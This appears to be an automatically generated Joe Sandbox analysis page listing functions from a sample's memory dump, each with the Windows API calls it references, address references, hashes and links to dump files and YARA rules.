Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 6c78aa44a2ca6a4ba80376836a5ae290b8961561c147ebd36a0b15e55dee2fcb
Instruction ID: 3166cbdc27700dda946521d1cf5dcae0193e2b088ba059bc2b9850ce974dec52
Opcode Fuzzy Hash: 6c78aa44a2ca6a4ba80376836a5ae290b8961561c147ebd36a0b15e55dee2fcb
Instruction Fuzzy Hash: B311E331250249BEEF216E29CC06FAB3BACEF95B54F114514FA59E2090D771DC719B14

Function 00242F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Part of subcall function 00242DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00242DC5
Part of subcall function 00242DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00242DD6
Part of subcall function 00242DA7: GetCurrentThreadId.KERNEL32 ref: 00242DDD
Part of subcall function 00242DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00242DE4

GetFocus.USER32 ref: 00242F78

Part of subcall function 00242DEE: GetParent.USER32(00000000), ref: 00242DF9

GetClassNameW.USER32(?,?,00000100), ref: 00242FC3
EnumChildWindows.USER32(?,0024303B), ref: 00242FEB

Strings

%s%d, xrefs: 00242FFF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 5f64f3ec26c0016a74378e446dcaaaa3432c14323496ca61e94f8276420b920a
Instruction ID: eefa98216423f46a3bbe0046b6ffefc6a9edccd93ca5673d0b921ea86c14b878
Opcode Fuzzy Hash: 5f64f3ec26c0016a74378e446dcaaaa3432c14323496ca61e94f8276420b920a
Instruction Fuzzy Hash: AE11E471710205ABCF08BF719CC6EEE37AAAF94314F044079F9099B152DF7099598F60

Function 00275882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002758C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002758EE
DrawMenuBar.USER32(?), ref: 002758FD

Strings

0, xrefs: 0027588F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: d4929a6a1b2ef9949cc6fec460dcf77f476c9b5dbfe744436bea5b98821cf389
Instruction ID: b30aeeb71f5aedf3c75ac2c537dab1114e32c15d6dd199f8b72b58ac9f44b13a
Opcode Fuzzy Hash: d4929a6a1b2ef9949cc6fec460dcf77f476c9b5dbfe744436bea5b98821cf389
Instruction Fuzzy Hash: 25016D31510229EFDB219F21EC48BAEBBB4FF45360F10C099E94DE6151DBB18A94DF61

Function 0023D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0023D3BF
FreeLibrary.KERNEL32 ref: 0023D3E5

Strings

X64, xrefs: 0023D2A8
GetSystemWow64DirectoryW, xrefs: 0023D3B9

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: dc259f4cbbb494e90cd547052a16e3503b0172a35200c7de05a446b18b4bf7bd
Instruction ID: 389601f6fc1f4cb1bdbd8e8fbc89fb5b866a1cc452eb2dad1e11926623df0e08
Opcode Fuzzy Hash: dc259f4cbbb494e90cd547052a16e3503b0172a35200c7de05a446b18b4bf7bd
Instruction Fuzzy Hash: B4F05CF183162287D3750A306C18AAA33249F00701FA484ADFC09E2006DB70CDB08A92

Function 0024007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b207000b89ba0f4c3a060addace7bfd41fc52ddc02fea898efd623f71c14c45c
Instruction ID: d094c95c6f6bef0bf2690fd7ec80a0e045ed9dae6804b49d68f62ba173feb598
Opcode Fuzzy Hash: b207000b89ba0f4c3a060addace7bfd41fc52ddc02fea898efd623f71c14c45c
Instruction Fuzzy Hash: 53C15D75A10206EFDB18CFA4C894EAEBBB5FF48704F108598E905EB251D771ED91CB90

Function 0026342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00263459
CoUninitialize.OLE32 ref: 00263463
VariantInit.OLEAUT32(?), ref: 0026346E
VariantClear.OLEAUT32(?), ref: 0026371B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 2ca8addb6fdb7277e5327eef984b11aaf654139a3011b9d1b006488517cb8128
Instruction ID: 8bf4a9dbc3d985486bf6344dbc05b9cd46597bf76c3bfcb566b3c91ab22bd2fc
Opcode Fuzzy Hash: 2ca8addb6fdb7277e5327eef984b11aaf654139a3011b9d1b006488517cb8128
Instruction Fuzzy Hash: 78A146752147019FD700DF29D885A2AB7E5FF88314F04885DF98A9B3A2DB30EE41CB92

Function 00240436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0027FC08,?), ref: 002405F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0027FC08,?), ref: 00240608
CLSIDFromProgID.OLE32(?,?,00000000,0027CC40,000000FF,?,00000000,00000800,00000000,?,0027FC08,?), ref: 0024062D
_memcmp.LIBVCRUNTIME ref: 0024064E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 6a5f9ef03c5c3f422724b6be5ff88072c347b6b2ebbc3304418f7b27327a174c
Instruction ID: 5cca81ca264c3a346f828425034b5afd4f9a25ee0fe76f56dfe36b2958221a8e
Opcode Fuzzy Hash: 6a5f9ef03c5c3f422724b6be5ff88072c347b6b2ebbc3304418f7b27327a174c
Instruction Fuzzy Hash: FB814C71A1010AEFCB04DF94C984EEEB7B9FF89315F204558E606AB250DB71AE46CF60

Function 00221391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002214C0

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ef0c34a6d987fdf1a16ed38f07dea4412fced34c1372494447b89c44af38ab8e
Instruction ID: 4716a2fdeb2cf9461426e2a633264a11e73e60b4de9c54372b7ccb6c59cd7c8d
Opcode Fuzzy Hash: ef0c34a6d987fdf1a16ed38f07dea4412fced34c1372494447b89c44af38ab8e
Instruction Fuzzy Hash: 1C412C31570225BADB217EF8AC46EAE3AA4EF61330F144266F81C96192D67448B19A61

Function 00276278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002762E2
ScreenToClient.USER32(?,?), ref: 00276315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00276382

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b7d116cec8eeb78eed7c32ee4f2efb2c5f4d315e8c3dae55b76e15107f2951fd
Instruction ID: 631e006af55d018cbd8e20a834753d68ea8c754337cdde1089b4cbec3c41320a
Opcode Fuzzy Hash: b7d116cec8eeb78eed7c32ee4f2efb2c5f4d315e8c3dae55b76e15107f2951fd
Instruction Fuzzy Hash: 19515E70A1064AEFCF14DF64D8889AE7BB6FF45760F108299F81997290D730EDA1CB90

Function 00261AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00261AFD
WSAGetLastError.WSOCK32 ref: 00261B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00261B8A
WSAGetLastError.WSOCK32 ref: 00261B94

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: fb8c6d5dee5c3c54047390bb048dccd9f3a1e427499d5aa243e154804090cb87
Instruction ID: ec71ebe4ac7ce847db45883d66a3ba733fdc6cb2452e2f778a820ed1488322c5
Opcode Fuzzy Hash: fb8c6d5dee5c3c54047390bb048dccd9f3a1e427499d5aa243e154804090cb87
Instruction Fuzzy Hash: 6441A434600601AFE7209F24D886F2977E5AB54718F58845CF61A9F3D3D771ED928B90

Function 0021B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2823eebda2c328939016dad78d9fe7f267472a36ba145a85381ed7ac4250e7d
Instruction ID: 91e98ebe4e1509588bb3ff2d2a4066419512987e4c76872b0ff15f44f2ab68d5
Opcode Fuzzy Hash: d2823eebda2c328939016dad78d9fe7f267472a36ba145a85381ed7ac4250e7d
Instruction Fuzzy Hash: 13412A71A20314BFD7259F78CC41BAABBF9EB98710F10852EF501DB6C2D37199A18B80

Function 002556D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00255783
GetLastError.KERNEL32(?,00000000), ref: 002557A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002557CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002557FA

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 594d00ae16579497e87b90388a2a02373c94bac6263c27a32f9e1c5dec7cdf47
Instruction ID: d63dc7b91918bca2af0920c2a15369d1aa1bc3fb36fed1d7ca89e48169d9bf45
Opcode Fuzzy Hash: 594d00ae16579497e87b90388a2a02373c94bac6263c27a32f9e1c5dec7cdf47
Instruction Fuzzy Hash: E7412C35600A51DFCB11DF15D444A1EBBE2EF99321B198488EC4AAB362CB30FD45CB91

Function 0021D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00206D71,00000000,00000000,002082D9,?,002082D9,?,00000001,00206D71,?,00000001,002082D9,002082D9), ref: 0021D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0021D9AB
__freea.LIBCMT ref: 0021D9B4

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ef496cddcee78601cc6e2af2f147df64419d78f1f2ef111eff453bc69aff3341
Instruction ID: 873750c58c3b3904cab41a1e8af7ee810f167638cdb96d9deb64956f19abb318
Opcode Fuzzy Hash: ef496cddcee78601cc6e2af2f147df64419d78f1f2ef111eff453bc69aff3341
Instruction Fuzzy Hash: 9B31AD72A2020AEBDB249F64DC45EEE7BE5EB50310B154169FC08D6291EB35DDA4CBA0

Function 002752C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00275352
GetWindowLongW.USER32(?,000000F0), ref: 00275375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00275382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002753A8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: d2780a66ee8b5eed7f27987210fa70269bd2285a1bedeadd8979fbc3762e7056
Instruction ID: 4898419d34dade9baa57abdd86211c876962ea792b59e9c377f64793c053df53
Opcode Fuzzy Hash: d2780a66ee8b5eed7f27987210fa70269bd2285a1bedeadd8979fbc3762e7056
Instruction Fuzzy Hash: 5C313730A75A2DEFEB349E24CC46FE9B765AB04390F54C181FA08921F0C3F0ADA09B41

Function 0024AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0024ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0024AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0024AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0024ACC6

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b1af08fc75631674077ef0dbf180e547f1173fc473b6e60e9efbefb7dc8928eb
Instruction ID: d0c540a1526c6ba68dcf584fd338297ca24bc05899123ca6f8473ff20b32ea0c
Opcode Fuzzy Hash: b1af08fc75631674077ef0dbf180e547f1173fc473b6e60e9efbefb7dc8928eb
Instruction Fuzzy Hash: 57313930AA071A6FEF3DCF64CC887FA7BA5AB89310F04431BE485571D0C37589A18792

Function 00277674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0027769A
GetWindowRect.USER32(?,?), ref: 00277710
PtInRect.USER32(?,?,00278B89), ref: 00277720
MessageBeep.USER32(00000000), ref: 0027778C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0db3aae52f791fedb8fec428c1ea09603da67a0c8efa2c2b6a59862b641f9fef
Instruction ID: 38ccef1b2aad87a531d6e506611abba0bc552ebbfe4cbd56a927eb8959ddf489
Opcode Fuzzy Hash: 0db3aae52f791fedb8fec428c1ea09603da67a0c8efa2c2b6a59862b641f9fef
Instruction Fuzzy Hash: 7D41AB34A15655EFCB09CF68D899EA9B7F5FB48304F54C1A8E8189B261C330A9A1CF90

Function 002716DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002716EB

Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65

GetCaretPos.USER32(?), ref: 002716FF
ClientToScreen.USER32(00000000,?), ref: 0027174C
GetForegroundWindow.USER32 ref: 00271752

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f67ae44eab5bb603e1c61e5e8f3b01abe56441993bd6093d947aee6c1d7d30f2
Instruction ID: 876c66c1ac50775e36bee5330bf911dcd945a8952fa6d2d9ac1957ba69f7d7fd
Opcode Fuzzy Hash: f67ae44eab5bb603e1c61e5e8f3b01abe56441993bd6093d947aee6c1d7d30f2
Instruction Fuzzy Hash: 90316171D10149AFCB04EFAAC881CAEF7F9EF58304B508069E415E7251D7319E45CBA0

Function 0024D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0024D501
Process32FirstW.KERNEL32(00000000,?), ref: 0024D50F
Process32NextW.KERNEL32(00000000,?), ref: 0024D52F
CloseHandle.KERNEL32(00000000), ref: 0024D5DC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c3656b4674ef86febc351d8a5969cf31f3e4850f9378b119cd5e1dd74e98e458
Instruction ID: cced23dfb6fd971c48cbf1ebcd151e687407e6adaf744d0119bf821f1185b5b2
Opcode Fuzzy Hash: c3656b4674ef86febc351d8a5969cf31f3e4850f9378b119cd5e1dd74e98e458
Instruction Fuzzy Hash: 6431C2711083419FD304EF64D885EAFBBF8EFA9344F90092DF585871A2EB719984CB92

Function 00278FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

GetCursorPos.USER32(?), ref: 00279001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00237711,?,?,?,?,?), ref: 00279016
GetCursorPos.USER32(?), ref: 0027905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00237711,?,?,?), ref: 00279094

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

